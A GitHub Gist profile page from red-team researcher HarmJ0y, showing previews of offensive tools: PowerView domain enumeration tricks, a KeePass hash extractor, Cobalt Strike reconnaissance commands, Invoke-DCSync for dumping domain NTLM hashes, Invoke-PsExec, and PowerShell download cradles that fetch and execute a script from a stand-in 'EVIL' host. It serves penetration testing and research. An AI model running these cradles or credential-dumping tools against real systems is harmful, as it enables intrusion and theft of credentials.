Skip to content

Instantly share code, notes, and snippets.

geeking out about Kerberos

Will HarmJ0y

geeking out about Kerberos
View GitHub Profile
HarmJ0y / PowerView-3.0-tricks.ps1
Last active Mar 1, 2021
PowerView-3.0 tips and tricks
View PowerView-3.0-tricks.ps1
# PowerView's last major overhaul is detailed here:
# tricks for the 'old' PowerView are at
# the most up-to-date version of PowerView will always be in the dev branch of PowerSploit:
# New function naming schema:
# Verbs:
# Get : retrieve full raw data sets
# Find : ‘find’ specific data entries in a data set
HarmJ0y / PowerView-2.0-tricks.ps1
Last active Feb 25, 2021
PowerView-2.0 tips and tricks
View PowerView-2.0-tricks.ps1
# NOTE: the most updated version of PowerView (
# has an updated tricks Gist at
# get all the groups a user is effectively a member of, 'recursing up'
Get-NetGroup -UserName <USER>
# get all the effective members of a group, 'recursing down'
Get-NetGroupMember -GoupName <GROUP> -Recurse
# get the effective set of users who can administer a server
HarmJ0y /
Created Jun 30, 2016
Python port of John the Ripper's keepass2john - extracts a HashCat/john crackable hash from KeePass 1.x/2.X databases
# Python port of keepass2john from the John the Ripper suite (
# ./keepass2john.c was written by Dhiru Kholia <dhiru.kholia at> in March of 2012
# ./keepass2john.c was released under the GNU General Public License
# source keepass2john.c source code from:
# Python port by @harmj0y, GNU General Public License
View DownloadCradles.ps1
# normal download cradle
IEX (New-Object Net.Webclient).downloadstring("http://EVIL/evil.ps1")
# PowerShell 3.0+
IEX (iwr 'http://EVIL/evil.ps1')
# hidden IE com object
$ie=New-Object -comobject InternetExplorer.Application;$ie.visible=$False;$ie.navigate('http://EVIL/evil.ps1');start-sleep -s 5;$r=$ie.Document.body.innerHTML;$ie.quit();IEX $r
# Msxml2.XMLHTTP COM object
HarmJ0y / cobaltstrike_sa.txt
Created Sep 28, 2018
Cobalt Strike Situational Awareness Commands
View cobaltstrike_sa.txt
Windows version:
reg query x64 HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion
Users who have authed to the system:
ls C:\Users\
System env variables:
reg query x64 HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\Environment
Saved outbound RDP connections:
HarmJ0y / Find-KeePassconfig.ps1
Created Jul 4, 2016
Finds and parses any KeePass.config.xml (2.X) and KeePass.ini (1.X) files.
View Find-KeePassconfig.ps1
function Find-KeePassconfig {
Finds and parses any KeePass.config.xml (2.X) and KeePass.ini (1.X) files.
Author: @harmj0y
License: BSD 3-Clause
Required Dependencies: None
Optional Dependencies: None
HarmJ0y / Jenkinsfile
Created Nov 2, 2020
Rubeus Jenkinsfile
View Jenkinsfile
@Library('ci-jenkins-common') _
// Jenkins build pipeline (declarative)
// Project: Seatbelt
// URL:
// Author: @tifkin_/@harmj0y
// Pipeline Author: harmj0y
def gitURL = ""
HarmJ0y / Invoke-DCSync.ps1
Last active Feb 2, 2021 — forked from monoxgas/Invoke-DCSync.ps1
What more could you want?
View Invoke-DCSync.ps1
This file has been truncated, but you can view the full file.
function Invoke-DCSync
Uses dcsync from mimikatz to collect NTLM hashes from the domain.
Author: @monoxgas
HarmJ0y / ConvertFrom-UserParameter.ps1
Last active Jan 22, 2021
View ConvertFrom-UserParameter.ps1
function ConvertFrom-UserParameter {
Converts a userparameters encoded blob into an ordered dictionary of decoded values.
Author: Will Schroeder (@harmj0y)
License: BSD 3-Clause
Required Dependencies: None
View Invoke-Psexec.ps1
function Invoke-PsExec {
This function is a rough port of Metasploit's psexec functionality.
It utilizes Windows API calls to open up the service manager on
a remote machine, creates/run a service with an associated binary
path or command, and then cleans everything up.
Either a -Command or a custom -ServiceEXE can be specified.
For -Commands, a -ResultsFile can also be specified to retrieve the